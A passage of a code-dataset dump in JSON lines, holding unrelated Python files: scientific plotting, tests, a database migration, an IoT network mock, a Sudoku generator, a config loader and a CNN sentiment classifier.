loadmat(op.join(OUTDIR, f'sub-{s:02d}_{hemi}{roi}.mat'))\n ok_voxs.append(filter_voxels(res))\n ok_voxs = np.hstack(ok_voxs)\n params[f'{hemi}{roi}'] = ok_voxs\n\n# save parameters for later use\nheader = ['row', 'col', 'std', 'gain', 'n']\n\nfor roi, param in params.items():\n fnout = op.join(OUTDIR, f'{roi}_median_param.txt')\n if not op.exists(fnout):\n np.savetxt(fnout, param, header=' '.join(header))\n else:\n print(f'Skipping {fnout}, file exists')\n\n","sub_path":"vtcdata/code/make_parameter_files.py","file_name":"make_parameter_files.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266675492","text":"\"\"\"\nCreate Figure 2. of Poleski and Yee (2009)\n\"Modeling microlensing events with MulensModel\"\nAstronomy and Computing 26, 35\nhttps://ui.adsabs.harvard.edu/abs/2019A&C....26...35P/abstract\nhttps://arxiv.org/abs/1803.01003\n\nExample magnification curves.\n\n\"\"\"\nfrom matplotlib import pyplot\nimport os\n\nfrom MulensModel import Model, SatelliteSkyCoord, MODULE_PATH\n\n\n# Define model parameters.\nparams = {'t_0': 2456900, 'u_0': 0.2, 't_E': 50.}\nparams_pi_E = {'pi_E_N': 0.35, 'pi_E_E': 0.5}\nparams_planet = {'rho': 0.002, 's': 1.5, 'q': 0.001, 'alpha': 348.1}\nra_dec = '18:00:00.00 -28:30:00.0'\n\n# Set models and satellite settings.\nmodel_pspl = Model(params)\nmodel_planet = Model({**params, **params_planet})\n\n# Calculate finite source magnification using VBBL method for this\n# range of dates:\nmodel_planet.set_magnification_methods([2456937, 'VBBL', 2456945])\n\n# Parallax settings:\nmodel_parallax = Model({**params, **params_pi_E}, coords=ra_dec)\nmodel_parallax.parallax(earth_orbital=True, satellite=True)\nsatellite = SatelliteSkyCoord(\n os.path.join(\n MODULE_PATH, 'data/ephemeris_files', 'Spitzer_ephemeris_01.dat'))\n# This file gives the Spitzer ephemeris and is part of MulensModel package.\n\n# Plot the magnification curves.\nplot_kwargs = {'subtract_2450000': True, 'lw': 2.}\npyplot.figure(figsize=(8, 8))\npyplot.axes([0.1, 0.43, 0.85, 0.55])\nmodel_planet.plot_magnification(label='planetary', **plot_kwargs)\nmodel_parallax.plot_magnification(\n label='annual parallax', linestyle='-.', **plot_kwargs)\nmodel_pspl.plot_magnification(label='PSPL', linestyle='--', **plot_kwargs)\nmodel_parallax.plot_magnification(\n label='satellite parallax', satellite_skycoord=satellite, **plot_kwargs)\npyplot.legend(loc='best')\n\npyplot.axes([0.1, 0.07, 0.85, 0.25]) # Lower panel starts here.\nmodel_planet.plot_trajectory(caustics=True)\npyplot.xlim(-1.52, 1.61)\npyplot.xlabel(r\"$\\theta_x$\")\npyplot.ylabel(r\"$\\theta_y$\")\npyplot.savefig('figure_2.png')\n","sub_path":"examples/plots_2.py","file_name":"plots_2.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"150046748","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2019 BuildGroup Data Services Inc.\nimport logging\n\nfrom caravaggio_rest_api.tests import CaravaggioBaseTest\nfrom davinci_crawling.proxy.proxy_mesh import ProxyMesh\nfrom django.conf import settings\n\n_logger = logging.getLogger(\"davinci_crawling.testing\")\n\n\nclass TestProxyMesh(CaravaggioBaseTest):\n \"\"\"\n Test the proxy mesh logic, this test requires connection with internet\n because we use the proxy mesh api.\n \"\"\"\n\n all_files_count = 0\n\n @classmethod\n def setUpTestData(cls):\n pass\n\n def test_available_proxies(self):\n \"\"\"\n Test if we can get the available proxies from the proxy mesh api.\n \"\"\"\n proxy_mesh = ProxyMesh()\n proxies = proxy_mesh.get_to_use_proxies()\n self.assertTrue(len(proxies) > 0)\n\n def test_available_proxies_with_country_restrictions(self):\n \"\"\"\n Test if we can get the available proxies from the proxy mesh api,\n with country restrictions on the settings.\n \"\"\"\n proxy_mesh_settings = settings.DAVINCI_CONF[\"architecture-params\"][\"proxy\"][\"proxy_mesh\"]\n\n self._assert_proxies_are_from(proxy_mesh_settings, [\"fr\"])\n self._assert_proxies_are_from(proxy_mesh_settings, [\"us\"])\n self._assert_proxies_are_from(proxy_mesh_settings, [\"fr\", \"us\"])\n\n def _assert_proxies_are_from(self, proxy_mesh_settings, countries):\n countries_str = \",\".join(countries)\n\n proxy_mesh_settings[\"only-proxies-from\"] = countries_str\n ProxyMesh.to_use_proxies = None\n ProxyMesh.available_proxies = None\n proxy_mesh = ProxyMesh()\n proxies = proxy_mesh.get_to_use_proxies()\n for proxy in proxies:\n proxy_http = proxy[\"http\"]\n proxy_http = proxy_http.replace(\"http://\", \"\")\n proxy_country = proxy_http[0:2]\n\n for country in countries:\n if country == proxy_country:\n break\n else:\n self.fail(\"Returned an invalid country\")\n\n def test_get_proxy_address(self):\n \"\"\"\n Test the proxy address get.\n \"\"\"\n all_proxies = ProxyMesh.get_available_proxies()\n\n received_proxies = set()\n for _ in range(50):\n proxy = ProxyMesh().get_proxy_address()\n received_proxies.add(proxy[\"http\"])\n\n # assert that we generated at least 50% of the possible values for\n # proxy\n self.assertTrue(len(received_proxies) > len(all_proxies) * 0.5)\n","sub_path":"src/davinci_crawling/proxy/tests/test_proxy_mesh.py","file_name":"test_proxy_mesh.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"94246010","text":"\"\"\"Add 'schedule_until' column to queries.\n\nRevision ID: eb2f788f997e\nRevises: d1eae8b9893e\nCreate Date: 2017-03-02 12:20:00.029066\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'eb2f788f997e'\ndown_revision = 'd1eae8b9893e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\n 'queries',\n sa.Column('schedule_until', sa.DateTime(timezone=True), nullable=True))\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('queries', 'schedule_until')\n","sub_path":"migrations/versions/eb2f788f997e_.py","file_name":"eb2f788f997e_.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"423091325","text":"####################################\n# Imports\n####################################\nimport requests\nimport random\nimport uuid\nimport time\nimport sys\nimport json\nimport paho.mqtt.client as mqtt\nimport gevent\n\n#from .MqttClient import MqttClient\nfrom .MacAddress import MacAddress\n\nclass CoreNetworkSimple:\n def __init__(\n self,\n mac=None,\n gk_url=None, \n mqtt_on_connect=lambda *args: None,\n mqtt_on_disconnect=lambda *args: None\n ):\n if gk_url is None:\n raise Exception('full gk_url must be provided')\n \n self.mqtt_on_connect = mqtt_on_connect\n self.mqtt_on_disconnect = mqtt_on_disconnect\n self.macAddress = MacAddress(mac=mac if mac is not None else random.randint(0, 10000000000))\n self.location_id = \"location-id-%s\" % (uuid.uuid4())\n self.network = self._core_create_dummy_network_model()\n self.gk_url = gk_url\n\n @staticmethod\n def nothing():\n return True\n\n def populate_network(self, mqtt_status = True, mqtt_history = True, retry = 2):\n runtime_start = time.time()\n\n # Register\n results = self._gatekeeper_register_network(retry = retry)\n runtime_gatekeeper_registration = time.time()\n self.network_id = self.guardian_mqtt['network_id']\n self.guardian_type = self.guardian_mqtt[\"mqType\"]\n\n # Initialize history\n if mqtt_status or mqtt_history:\n self._mqtt_connect()\n \n guardianReport = self._create_guardian_status_report()\n motionReport = self._create_motionmatrix_report()\n \n if mqtt_status:\n self._mqtt_publish(\"guardian-status\", guardianReport)\n if mqtt_history:\n self._mqtt_publish(\"motion-matrix\", motionReport)\n\n # Return stats\n runtime_end_mqtt = time.time()\n runtimes = {\n \"total\": runtime_end_mqtt - runtime_start,\n \"gatekeeper\": runtime_gatekeeper_registration - runtime_start,\n \"mqtt\": runtime_end_mqtt - runtime_gatekeeper_registration,\n }\n return {'results': results, 'runtimes': runtimes}\n \n def send_guardian_status_report(self, timestamp = time.time()):\n guardianReport = self._create_guardian_status_report(timestamp)\n self._mqtt_publish(\"guardian-status\", guardianReport)\n\n def send_heartbeat(self, timestamp = time.time()):\n guardianReport = self._create_guardian_status_report(timestamp, heartbeat = True)\n self._mqtt_publish(\"guardian-status\", guardianReport)\n\n def send_motion(self, timestamp = time.time()):\n motionReport = self._create_motionmatrix_report(timestamp = timestamp)\n self._mqtt_publish(\"motion-matrix\", motionReport)\n\n #--- Internal API past this point\n \n def __del__(self):\n if hasattr(self, \"mqtt_connection\"):\n self._mqtt_disconnect()\n\n @property\n def guardian_mqtt(self):\n return self.network['nodes'][0]['gk_reply']['local_config']['guardian_mqtt']\n \n def _mqtt_connect(self, username = 'device'):\n self.mqtt_connection = mqtt.Client(client_id=self.location_id)\n self.mqtt_connection.username_pw_set(username=username, password=self.guardian_mqtt['mqToken'])\n self.mqtt_connection.connect(self.guardian_mqtt['mqServer'], port=self.guardian_mqtt['mqPort'])\n self.mqtt_connection.on_connect = self.mqtt_on_disconnect\n self.mqtt_connection.on_disconnect = self.mqtt_on_disconnect\n self.glet = gevent.spawn(self.mqtt_connection.loop_forever)\n\n def _mqtt_publish(self, event, data):\n # Blocking call to send a report to an MQTT client\n topic = \"iot-2/type/%s/id/%s/evt/%s/fmt/json\" % (self.guardian_type, self.location_id, event)\n\n check = 0\n msg_info = self.mqtt_connection.publish(topic, json.dumps(data), qos=1)\n if not msg_info.is_published():\n while not msg_info.is_published():\n gevent.sleep(0.1)\n check += 1\n if check > 300:\n print(\"Failed to publish to MQTT\")\n return False\n\n def _mqtt_disconnect(self):\n print(\"MQTT disconnect in progress\", self.location_id)\n self.mqtt_connection.disconnect()\n gevent.joinall([self.glet])\n delattr(self, \"mqtt_connection\")\n\n def _core_create_dummy_network_model(self):\n mac_address = self.macAddress\n \n # Define a 3-node mesh network, where one acts as the gateway.\n network = {\n # External IP assigned to the master wan0 ethernet\n # interface.\n \"ip\": \"10.0.0.0\",\n # Gateway mac and IP address\n \"gateway\": {\"mac\": \"ff:00:00:00:00:00\", \"ip\": \"10.0.0.0\"},\n \"nodes\": [\n {\n # Master node\n \"role\": \"master\",\n \"mesh_mac\": mac_address.address(),\n \"eth_mac\": mac_address.offset(1),\n \"wlan_2ghz_mac\": mac_address.offset(2),\n \"wlan_5ghz_mac\": mac_address.offset(3),\n \"peers\": [1, 2, 3],\n },\n {\n # Peer node 1\n \"role\": \"peer\",\n \"mesh_mac\": mac_address.offset(\"10\"),\n \"eth_mac\": mac_address.offset(\"11\"),\n \"wlan_2ghz_mac\": mac_address.offset(\"12\"),\n \"wlan_5ghz_mac\": mac_address.offset(\"13\"),\n \"peers\": [0, 2, 4],\n },\n {\n # Peer node 2\n \"role\": \"peer\",\n \"mesh_mac\": mac_address.offset(\"20\"),\n \"eth_mac\": mac_address.offset(\"21\"),\n \"wlan_2ghz_mac\": mac_address.offset(\"22\"),\n \"wlan_5ghz_mac\": mac_address.offset(\"23\"),\n \"peers\": [0, 1, 5],\n },\n {\n # Leaf node 1 (connected to Master)\n \"role\": \"leaf\",\n \"mesh_mac\": mac_address.offset(\"30\"),\n \"peers\": [0],\n },\n {\n # Leaf node 2 (connected to Peer node 1)\n \"role\": \"leaf\",\n \"mesh_mac\": mac_address.offset(\"40\"),\n \"peers\": [1],\n },\n {\n # Leaf node 3 (connected to Peer node 2)\n \"role\": \"leaf\",\n \"mesh_mac\": mac_address.offset(\"50\"),\n \"peers\": [2],\n },\n ],\n }\n return network\n\n def _gatekeeper_register_network(self, retry = 2):\n # Register a new (or existing) network by publishing radar status\n # reports to gatekeeper.\n # print(\"Registering network with gatekeeper @ %s...\" % gatekeeper_url)\n results = []\n for node in self.network[\"nodes\"]:\n if node[\"role\"] not in [\"master\", \"peer\"]:\n continue\n\n status = self._create_radar_status_report(node)\n payload = {\n \"radar_status\": status,\n \"factory_reset\": False,\n \"master_failed\": False,\n \"location_id\": self.location_id,\n }\n \n while True:\n root = requests.post(self.gk_url, json=payload)\n if retry == 0:\n print(root.__dict__)\n raise Exception(\"Failed to register %s with gatekeeper, after 3 tries.\" % node)\n elif root.status_code == 200:\n node['gk_reply'] = root.json()\n results.append(root.status_code)\n break\n else:\n rand_number = random.randint(10, 30)\n print(\"Retrying in %i\" % rand_number)\n time.sleep(rand_number)\n retry -= 1\n \n return results\n\n def _create_motionmatrix_report(self, timestamp = time.time(), interval = 500, count = 1, report_type=\"matrix\"):\n # Create a dummy motion matrix report\n def mac_to_linkstr(mac):\n return mac.replace(\":\", \"\")[-6:]\n\n data_key = \"data\" if report_type == \"matrix\" else \"motion\"\n\n report = {\n \"ts\": timestamp,\n \"interval\": interval,\n \"count\": count,\n data_key: {\"mkai\": [], \"throughput\": []},\n \"links\": [],\n }\n\n # Generate link list combinations (using the mesh macs in the\n # network).\n for i in range(len(self.network[\"nodes\"]) - 1):\n for j in range(i + 1, len(self.network[\"nodes\"])):\n src_mac = self.network[\"nodes\"][i][\"mesh_mac\"]\n dest_mac = self.network[\"nodes\"][j][\"mesh_mac\"]\n report[\"links\"].append( mac_to_linkstr(src_mac) + \"-\" + mac_to_linkstr(dest_mac) )\n\n for l in range(len(report[\"links\"])):\n # Omit the outer arrays when count=1\n if count == 1:\n mkai = random.random()\n throughput = 1.0\n else:\n mkai = [random.random() for x in range(report[\"count\"])]\n throughput = [1.0]*report[\"count\"]\n report[data_key][\"mkai\"].append(mkai)\n report[data_key][\"throughput\"].append(throughput)\n \n return report\n\n\n\n\n def _create_guardian_status_report(self, timestamp = time.time(), heartbeat = False):\n report = {\n \"ts\": timestamp if timestamp is not None else time.time(),\n \"guardian_id\": self.location_id,\n \"network_id\": self.network_id,\n \"last_motion\": time.time(),\n \"motion_enabled\": 1,\n \"motion_tripped\": 0\n }\n\n if heartbeat == False:\n radar_reports = {}\n for node in self.network[\"nodes\"]:\n if node[\"role\"] not in [\"master\", \"peer\"]:\n continue\n radar_reports[\"test-\" + node[\"eth_mac\"].replace(\":\", \"\")] = self._create_radar_status_report(node)\n report[\"radars\"] = radar_reports\n\n return report\n\n def _create_radar_status_report(self, node, timestamp = time.time()):\n # Create a dummy-status block for a given network node,\n # such that we can get a valid response from gatekeeper\n # with it.\n\n # Master node must be first one\n master_node = self.network[\"nodes\"][0]\n timestamp = time.time()\n\n # Create empty status report\n status = {\n \"location_id\": self.location_id,\n \"deviceId\": \"test-\" + node[\"eth_mac\"].replace(\":\", \"\"),\n \"ts\": timestamp,\n \"interfaces\": [],\n \"links\": [],\n \"ap_bssid_2ghz\": node[\"wlan_2ghz_mac\"],\n \"ap_bssid_5ghz\": node[\"wlan_5ghz_mac\"],\n \"mesh_bssid\": node[\"mesh_mac\"],\n \"gateway_bssid\": master_node[\"mesh_mac\"],\n \"root_mode\": 1,\n }\n\n # Override gateway bssid for master node:\n if node == master_node:\n status[\"gateway_bssid\"] = self.network[\"gateway\"][\"mac\"]\n status[\"root_mode\"] = 2\n\n # Add wan0 ethernet interface with default gateway,\n # but only set its' type to ETHERNET if this is the master.\n if node == master_node:\n if_type = \"ETHERNET\"\n else:\n if_type = \"BRIDGE\"\n\n interface = {\n \"name\": \"wan0\",\n \"type\": if_type,\n \"mac\": node[\"eth_mac\"],\n \"ip\": \"10.22.22.1\",\n \"routes\": [{\"dst\": \"0.0.0.0\"}],\n }\n status[\"interfaces\"].append(interface)\n\n # Populate link list for all local peers\n # This is what is actually used to form the network.\n for peer_id in node[\"peers\"]:\n peer_node = self.network[\"nodes\"][peer_id]\n\n link_entry = {\"mac\": peer_node[\"mesh_mac\"], \"peer_type\": \"7\"}\n\n if peer_node[\"role\"] == \"leaf\":\n link_entry[\"peer_type\"] = \"2\"\n\n status[\"links\"].append(link_entry)\n \n return status\n \n","sub_path":"workers/mns_py/src/common/core_network_mock.py","file_name":"core_network_mock.py","file_ext":"py","file_size_in_byte":12202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"167196415","text":"from fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nimport json\n\nwith open(\"imdb_output.json\", \"r\") as f:\n movies = json.load(f)\n\nwith open(\"movie_budget.json\", \"r\") as f:\n budgets = json.load(f)\n\ntitles = {}\ntitlesList = []\nfor id, movie in enumerate(budgets):\n\ttitles[movie['movie_name']]= id\n\ttitlesList.append(movie['movie_name'])\n\n\nnewMovies = []\nfor id, movie in enumerate(movies):\n\t#find the closest match\n\tmatch = process.extractOne(movie['movie_title'], titlesList)\n\tresult = match[0]\n\n\tif match[1] > 90:\n\t\t#get the proper budget data\n\t\tbudget_data = budgets[titles[result]]\n\t\tmovie['release_date'] = budget_data['release_date']\n\t\tmovie['worldwide_gross'] = budget_data['worldwide_gross']\n\t\tmovie['production_budget'] = budget_data['production_budget']\n\t\tnewMovies.append(movie)\n\nwith open('imdb_output_budget.json', 'w') as fp:\n json.dump(newMovies, fp)","sub_path":"updatebudgets.py","file_name":"updatebudgets.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5914202","text":"\nimport torch.nn as nn\nfrom torch.functional import F\nimport torch\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\nclass CNN(nn.Module):\n def __init__(self, vocab_size, embedding_dim, n_filters, filter_sizes, output_dim, \n dropout, pad_idx):\n \n super().__init__()\n \n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n \n self.convs = nn.ModuleList([\n nn.Conv2d(in_channels = 1, \n out_channels = n_filters, \n kernel_size = (fs, embedding_dim)) \n for fs in filter_sizes\n ])\n \n self.fc = nn.Linear(len(filter_sizes) * n_filters, output_dim)\n \n self.dropout = nn.Dropout(dropout)\n \n def forward(self, text):\n \n #text = [sent len, batch size]\n \n text = text.permute(1, 0)\n \n #text = [batch size, sent len]\n \n embedded = self.embedding(text)\n \n #embedded = [batch size, sent len, emb dim]\n \n embedded = embedded.unsqueeze(1)\n \n #embedded = [batch size, 1, sent len, emb dim]\n \n conved = [F.relu(conv(embedded)).squeeze(3) for conv in self.convs]\n \n #conv_n = [batch size, n_filters, sent len - filter_sizes[n]]\n \n pooled = [F.max_pool1d(conv, conv.shape[2]).squeeze(2) for conv in conved]\n \n #pooled_n = [batch size, n_filters]\n \n cat = self.dropout(torch.cat(pooled, dim = 1))\n\n #cat = [batch size, n_filters * len(filter_sizes)]\n \n return self.fc(cat)\n\n\nINPUT_DIM = 20002\nEMBEDDING_DIM = 100\nN_FILTERS = 100\nFILTER_SIZES = [2,3,4]\nOUTPUT_DIM = 6\nDROPOUT = 0.5\nPAD_IDX = 1\n\nmodel = CNN(INPUT_DIM, EMBEDDING_DIM, N_FILTERS, \nFILTER_SIZES ,OUTPUT_DIM, DROPOUT, PAD_IDX)\n\nmodel.load_state_dict(torch.load('./cnn/tut2-model.pt'))\nimport pickle\n\nTEXT = pickle.load(open('./cnn/train_data_field', 'rb'))\n\nimport spacy\nnlp = spacy.load('en')\n\ndef predict_sentiment(sentence):\n model.eval()\n tokenized = [tok.text for tok in nlp.tokenizer(sentence)]\n indexed = [TEXT.vocab.stoi[t] for t in tokenized]\n\n \n length = [len(indexed)]\n tensor = torch.LongTensor(indexed).to(device)\n tensor = tensor.unsqueeze(1)\n length_tensor = torch.LongTensor(length)\n\n prediction = torch.sigmoid(model(tensor))\n return list(prediction.squeeze().detach())\n","sub_path":"cnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556932394","text":"#-*- coding: utf-8 -*- \nimport twitterMiner as tm\nimport networkx as nx\nimport pickle\nfrom pprint import pprint\n\nspain = pickle.load(open('spain_detailed.p'))\nengland = pickle.load(open('england_detailed.p'))\n\ntwitter = tm.get_twitter()\n\ndef get_player_friends(g):\n gs = nx.read_graphml(g)\n for node in gs.nodes():\n screenName = gs.node[node] \n playerFriends = twitter.get_friends_list(screen_name=screenName)\n for friend in playerFriends['users']:\n print(friend.keys()[0])\n return gs\n\nspainGraph = get_player_friends('followersSpain.graphml')\n#englandGraph = get_player_friends(england)\n\nnx.write_graphml(spainGraph, 'spain528.graphml.gz')\n#nx.write_graphml(englandGraph, 'england.graphml.gz')\n","sub_path":"friends.py","file_name":"friends.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633960644","text":"f = open(\"random_output.txt\", \"r+\")\nl = f.readlines()\nf.close()\n\nd = {}\nfor s in l:\n\ts = s.strip()\n\tfor i in s:\n\t\tif i in d:\n\t\t\td[i] += 1\n\t\telse:\n\t\t\td[i] = 1\nprint(sorted(d))","sub_path":"level_4/letters.py","file_name":"letters.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"288123789","text":"import speech_recognition as sr \r\nclass Microfone:\r\n\tdef __init__():\r\n\t\tglobal falou\r\n\t\tr = sr.Recognizer() \r\n\t\twith sr.Microphone() as source: \r\n\t\t\tprint(\"Pronta para comandar\") \r\n\t\t\taudio = r.listen(source) \r\n\t\ttry:\r\n\t\t\tprint(\"Você disse \" + r.recognize_google(audio, language=\"pt-BR\"))\r\n\t\t\tfalou = r.recognize_google(audio, language=\"pt-BR\")\r\n\t\texcept sr.UnknownValueError:\r\n\t\t\tprint(\"Não entendi\")\r\n\t\texcept sr.RequestError as e:\r\n\t\t\tprint(\"Sem requests; {0}\".format(e))","sub_path":"microfone.py","file_name":"microfone.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113605009","text":"# -*- coding: utf-8 -*-\n'''\nMultiplexer Configuration\n\n{\n \"artifacts\": [\n {\n \"name\": \"production/allapps\"\n \"sources\": [\n {\"name\": \"app1\", \"revision\": \"prod\"},\n {\"name\": \"app2\", \"revision\": \"master\"},\n {\"name\": \"app3\", \"revision\": \"production\"}\n ]\n },\n {\n \"name\": \"staging/allapps\"\n \"sources\": [\n {\"name\": \"app1\", \"revision\": \"prod\"}\n {\"name\": \"app3\", \"revision\": \"staging\"}\n ]\n }\n ],\n \"github\": {\n \"token\": \"mytoken\"\n },\n\"sources\": {\n \"app1\": {\n \"owner\": \"myorg\",\n \"repository\": \"app1\",\n \"type\": \"github\"\n },\n \"app2\": {\n \"type\": \"github\"\n \"revision\": \"production\",\n \"owner\": \"myorg\"\n \"repository\": \"app2\"\n },\n \"app3\": {\n \"type\": \"github\",\n \"owner\": \"myorg\",\n \"repo\": app3\"\n }\n}\n'''\n\nimport time\n\nfrom collections import OrderedDict\n\nimport boto3\nimport json\nimport re\n\n\nTYPES = {'github': {'token': None}}\nS3_REGEX = r'^s3:\\/\\/([a-zA-Z0-9\\_\\-]+)\\/?([a-zA-Z0-9\\_\\/\\.]+)?'\n\ndef load(conf):\n '''Attempts to load the config after checking for S3 or local'''\n s3_info = re.search(S3_REGEX, conf)\n\n if s3_info:\n bucket = s3_info.group(1)\n key = s3_info.group(2)\n return load_s3(bucket, key)\n\n return load_file(conf)\n\n\ndef load_s3(s3_bucket, s3_object):\n \"\"\"Load Configuration file from an S3 Bucket\"\"\"\n client = boto3.client('s3')\n resp = client.get_object(\n Bucket=s3_bucket,\n Key=s3_object,\n )\n\n conf_body = resp['Body'].read()\n if isinstance(conf_body, (bytes, bytearray)):\n conf_body = conf_body.decode('utf-8')\n return Configuration(conf_body)\n\n\ndef load_file(pth):\n \"\"\"Load configuration from local file\"\"\"\n fil = open(pth, 'r')\n return Configuration(fil.read())\n\n\nclass Configuration(object):\n def __init__(self, body):\n self._raw = {}\n self.artifacts = []\n\n self._load(body)\n self._validate()\n\n def _load(self, raw_body):\n \"\"\"Load JSON file\"\"\"\n body = json.loads(raw_body)\n self._raw = body\n\n # Populate self.artifacts\n for artifact in self._raw.get('artifacts', []):\n art_obj = {'name': artifact['name'], 'sources': OrderedDict()}\n\n for repo in artifact.get('sources', []):\n r_info = self._raw['sources'].get(repo['name'])\n if not r_info:\n raise Exception(\n 'source {} defined in artifact {} but not listed in sources'.format(\n repo['name'], artifact['name']))\n\n r = r_info.copy()\n r.update(repo)\n art_obj['sources'][repo['name']] = r\n self.artifacts.append(art_obj)\n\n def _validate(self):\n \"\"\"Validate Configuration structure\"\"\"\n req = {'artifacts': list, 'sources': dict}\n for key, typ in req.items():\n val = self._raw.get(key)\n if not val:\n raise Exception('configuration missing required key ' + key)\n\n if not isinstance(val, typ):\n raise Exception('key {} invalid type, expect {}'.format(\n key, typ))\n\n # TODO: Validate attributes are set per the type in sources\n for name, repo in self._raw['sources'].items():\n typ = repo.get('type')\n if not repo.get('type'):\n raise Exception('source {} missing type'.format(\n name))\n\n if not TYPES.get(typ):\n raise ValueError('invalid type ' + typ)\n\n # If type configuration is not set then set the, defaults\n if not self._raw.get(typ):\n self._raw[typ] = TYPES[typ]\n\n def lookup_artifacts(self, source, revision, source_type='github'):\n \"\"\"Return a list of artifacts to build based on a source and revision\"\"\"\n if not source_type == 'github':\n raise Exception('github only supported source at this time')\n\n owner, repo = source.split('/')\n res_artifacts = []\n for artifact in self.artifacts:\n for name, info in artifact['sources'].items():\n if info['owner'] == owner and info['repository'] == repo and info['revision'] == revision:\n res_artifacts.append(artifact)\n\n return res_artifacts\n\n def artifact(self, name):\n \"\"\"Return the artifact object given a name\"\"\"\n for artifact in self.artifacts:\n if artifact['name'] == name:\n return artifact\n\n raise Exception('artifact {} does not exist'.format(name))\n\n def __getattr__(self, key):\n \"\"\"Override getattr\"\"\"\n if key in self._raw:\n return self._raw[key]\n\n return object.__getattribute__(self, key)\n","sub_path":"multiplexer/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"66297360","text":"# 這個 example 是用來說明 ** 的使用方式\n#\n# reference: http://stackoverflow.com/questions/2921847/what-does-the-star-operator-mean-in-python\n# http://www.cnblogs.com/fengmk2/archive/2008/04/21/1163766.html\n#\n# def sum(a, b, c, d):\n# return a + b + c + d\n#\n# values1 = (1, 2)\n# values2 = { 'c': 10, 'd': 15 }\n# s = sum(*values1, **values2)\n#\n# 相當於:\n# s = sum(1, 2, c=10, d=15)\n#\n\n\ndef dump_params(**params):\n # 由 dump_params(a=1, b=2, c=3) 這個 function 可以得知:\n # 在裡面的 params 會被重組成一個 dict\n # 基於這樣的概念,如果外面傳的是一個 dict 則要利用 ** 拆解\n # ** 對於 function 來說則會是重組\n\n print (params)\n\n\ndef dump_dict(**params):\n print(\"length of params: {0}\".format(len(params)))\n \n for key in params:\n print(\"key: {0}, value: {1}\".format(key, params[key]))\n\n\ndef build_dict(**params):\n return params\n\n\n\nif __name__ == \"__main__\":\n json = {'a':12, 'b':13, 'c':14}\n \n # This will show:\n # key: c, value: 14\n # key: b, value: 13\n # key: a, value: 12 \n # 可以知道一件事情:因為是 dict, 所以他們是沒有按照順序的。\n # 即使有也只是湊巧!\n dump_dict(**json)\n \n # 因為他預期接收到的是 \"拆解後的\" dict 可是我們給他的不是,會發生錯誤\n try:\n dump_params(json)\n except TypeError:\n print(\"dump_params Error, Because of wrong type\")\n\n dump_params(a=1, b=2, c=3)\n \n # 利用這種方式就可以用來創建字典,很方便!\n print (build_dict(a=1, b=2, c=3))\n\n\n\n","sub_path":"star_param/double_star.py","file_name":"double_star.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483131267","text":"import sys\nimport os\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\n\nfrom src.file_reader import FileReader\nfrom src.sudoku_generator import SudokuBoardGenerator\n\nfrom src.file_writer import FileWriter\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print('Must specify input file and output file only')\n quit()\n\n else:\n input_file_str = sys.argv[1]\n output_file_str = sys.argv[2]\n\n try:\n input_file = open(input_file_str, 'r')\n output_file = open(output_file_str, 'w')\n except:\n print('Error opening file')\n quit()\n\n fileReader = FileReader(input_file)\n fileWriter = FileWriter(output_file)\n M, N, P, Q = fileReader.get_params_generator()\n\n sudoku_board = SudokuBoardGenerator(M, N, P, Q)\n sudoku_board.generate_board()\n board_as_lists = sudoku_board.convert_board_to_list()\n fileWriter.write_generated_board_to_file(N, P, Q, board_as_lists)","sub_path":"bin/MySudokuGenerator.py","file_name":"MySudokuGenerator.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113975016","text":"# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import annotations\n\nimport logging\nfrom dataclasses import dataclass\nfrom pathlib import PurePath\nfrom textwrap import dedent\nfrom typing import Iterable\n\nfrom pants.backend.experimental.python.lockfile_metadata import (\n LockfileMetadata,\n calculate_invalidation_digest,\n)\nfrom pants.backend.python.subsystems.python_tool_base import (\n DEFAULT_TOOL_LOCKFILE,\n NO_TOOL_LOCKFILE,\n PythonToolRequirementsBase,\n)\nfrom pants.backend.python.target_types import EntryPoint, PythonRequirementsField\nfrom pants.backend.python.util_rules.interpreter_constraints import InterpreterConstraints\nfrom pants.backend.python.util_rules.pex import PexRequest, PexRequirements, VenvPex, VenvPexProcess\nfrom 